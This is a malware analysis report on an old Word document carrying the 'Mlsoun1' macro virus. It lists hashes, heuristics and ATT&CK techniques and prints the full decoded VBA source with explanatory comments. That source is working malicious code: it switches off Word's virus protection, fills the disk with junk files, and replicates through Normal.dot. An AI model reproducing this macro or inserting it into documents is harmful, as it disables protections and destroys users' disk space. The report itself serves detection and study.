Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea7f86e2ad9312d1…

MALICIOUS

Office (OLE)

32.0 KB Created: 1997-01-30 14:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f89c2517d32d5d53cd7642fc95d078c4 SHA-1: 7ba4dc3c8e2d2021cb489d23eb47e8a5bcc217c3 SHA-256: ea7f86e2ad9312d16cde4794ec3795d8dcaee2acf9808601d6968c18188d7148
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including AutoOpen and AutoClose functions, indicating malicious intent. The Autoexec macro disables Word's virus-protection option, keeps a run counter in a file named 'count.dll' and, on each run, writes a fixed text string 30,000 times into a sequentially numbered '.dll' file (e.g., 'off1.dll') in the application's path — a disk-filling payload; the recovered code contains no download or execution of secondary payloads. The AutoOpen macro (Sub MAIN) copies the 'Mlsoun1' and 'AutoOpen' project items from the opened document into Normal.dot, and AutoClose/AutoExit copy them back from the template into the active document, the classic macro-virus replication pattern. The presence of legacy WordBasic markers further supports its malicious nature.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3699 bytes
SHA-256: 27b06f1c467bf9d1ca581e7ffa24887f417bf1ebbfd2e381bf50cb1f38db7204
Preview script
First 1,000 lines of the extracted script
' Module 1 of 3 in the carve: "ThisDocument". Only the attribute header was
' recovered for it; no procedures follow before the next module.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module 2 of 3: "Mlsoun1". Holds Autoexec, AutoClose and AutoExit below.
' "Mlsoun1" is also the project-item name the macros copy between Normal.dot
' and documents, so this module is the unit that gets replicated.
Attribute VB_Name = "Mlsoun1"
' Autoexec: run counter plus disk-filling payload. Each execution increments
' a counter stored in <Application.Path>\count.dll and then writes one fixed
' text line 30,000 times into <Application.Path>\off<N>.dll. Nothing in this
' procedure downloads or executes anything. Observable effects — the
' VirusProtection option being switched off and count.dll / off<N>.dll
' appearing in Word's program directory — are the detection points.
Sub Autoexec()
'jsem&ml$oun2   (author tag, left as written; Czech "jsem" = "I am")
'for template
Dim pocitadlo As Integer   ' "pocitadlo" = counter
On Error GoTo errs
    Options.VirusProtection = False   ' turns off Word's built-in macro virus warning
    ChDir (Application.Path)
    filecount = CurDir + "\count.dll"   ' counter file lives next to the Word executable
    Open filecount For Binary As #1
    Get #1, 1, pocitadlo   ' previous run count; presumably 0 on a fresh file — verify
    pocitadlo = pocitadlo + 1
    Put #1, 1, pocitadlo
    Close #1
    soubor = Application.Path & "\" & "off" & pocitadlo & ".dll"   ' "soubor" = file: off1.dll, off2.dll, ...
    Open soubor For Output As #2
    retezec = "Jsem Mlsoun1, a mam rad Vas harddisk, radeji si poridte velmi maly, at mne lepe najdete!"
    ' "retezec" = string. Czech: "I am Mlsoun1 and I like your hard disk; better
    ' get a very small one so you can find me more easily!"
    ' delk is never initialised, so it starts at 0 and the loop writes 30,000 lines.
    Do While Not delk = 30000
        Print #2, retezec
        delk = delk + 1
    Loop
    Close #2
Exit Sub
errs:
    Select Case Err.Number
        Case 61   ' VB runtime error 61 = Disk full, i.e. the payload ran to completion
            c = MsgBox("Nedostatek mista na disku!Toto zpusobil virus MLSOUN!", vbExclamation)
            ' message (Czech): "Not enough space on disk! This was caused by the MLSOUN virus!"
        Case Else   ' every other error is silently swallowed
    End Select
End Sub
' AutoClose: runs when the document is closed. Copies the "Mlsoun1" and
' "AutoOpen" project items from Normal.dot into the document being closed
' (template -> document). Together with MAIN in the AutoOpen module
' (document -> template) this forms the replication loop.
Sub AutoClose()
'from template to file
On Error GoTo errs
    docu = Application.ActiveDocument.Name
    ' Intended to skip the global template, but it tests the never-assigned
    ' variable `dok` rather than `docu`, so this guard never fires.
    If dok = "Normal.dot" Then Exit Sub
    docupath = Application.ActiveDocument.Path + "\" + docu
    templname = Application.NormalTemplate.Name
    templpath = Application.NormalTemplate.Path + "\" + templname
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="Mlsoun1", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
' No Exit Sub before the label: on success execution falls into the handler
' with Err.Number = 0, which the Case 0 arm absorbs.
errs:
    Select Case Err.Number
        Case 5940   ' "project item cannot be copied" (per the author's note in MAIN)
        Case 4248
        Case 4198
        Case 4149
        Case 0
        Case Else   ' all errors ignored; the copy is best-effort
    End Select
End Sub
' AutoExit: identical to AutoClose apart from the commented-out Save line.
' Presumably fires when Word exits rather than when a document closes, giving
' a second chance to copy the "Mlsoun1" and "AutoOpen" project items from
' Normal.dot into the active document (template -> document).
Sub AutoExit()
'from template to file
On Error GoTo errs
    'Application.ActiveDocument.Save
    docu = Application.ActiveDocument.Name
    ' Same defect as in AutoClose: `dok` is never assigned, so this never exits.
    If dok = "Normal.dot" Then Exit Sub
    docupath = Application.ActiveDocument.Path + "\" + docu
    templname = Application.NormalTemplate.Name
    templpath = Application.NormalTemplate.Path + "\" + templname
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="Mlsoun1", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
' Falls through into the handler with Err.Number = 0 on success.
errs:
    Select Case Err.Number
        Case 5940   ' "project item cannot be copied" (per the author's note in MAIN)
        Case 4248
        Case 4198
        Case 4149
        Case 0
        Case Else   ' all errors ignored
    End Select
End Sub

' Module 3 of 3: "AutoOpen". A Sub MAIN inside a module named AutoOpen is the
' WordBasic-era convention for an auto-open macro — the legacy marker that the
' OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic in this report points at.
Attribute VB_Name = "AutoOpen"
' MAIN: runs when an infected document is opened. Copies the "Mlsoun1" and
' "AutoOpen" project items from the opened document into Normal.dot
' (document -> template), i.e. it infects Word's global template so that
' AutoClose/AutoExit can later seed every other document.
Sub MAIN()
'jsem&ml$oun2   (author tag, left as written)
'from file to template
On Error GoTo errs
    Options.VirusProtection = False   ' turns off Word's macro virus warning before copying
    docu = Application.ActiveDocument.Name
    docupath = Application.ActiveDocument.Path + "\" + docu
    ChDir (Application.NormalTemplate.Path)
    activedir = CurDir + "\Normal.dot"   ' target: the global template
    Application.OrganizerCopy Source:= _
    docupath, Destination:= _
    activedir, Name:="Mlsoun1", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:= _
    docupath, Destination:= _
    activedir, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
    Exit Sub
errs:
    Select Case Err.Number
        Case 5940   'the project item cannot be copied
        Case 61   ' Disk full (e.g. after Autoexec has filled the drive)
            c = MsgBox("Na disku není dostatek místa. Uvolnìte místo smazáním nìkolika souborù!", vbExclamation + vbOKOnly)
            ' message (Czech, mis-encoded in this carve): "There is not enough space on
            ' the disk. Free up space by deleting a few files!"
        Application.ActiveWindow.Close (False)   ' closes the window; presumably without saving — verify
        Case Else
    End Select
End Sub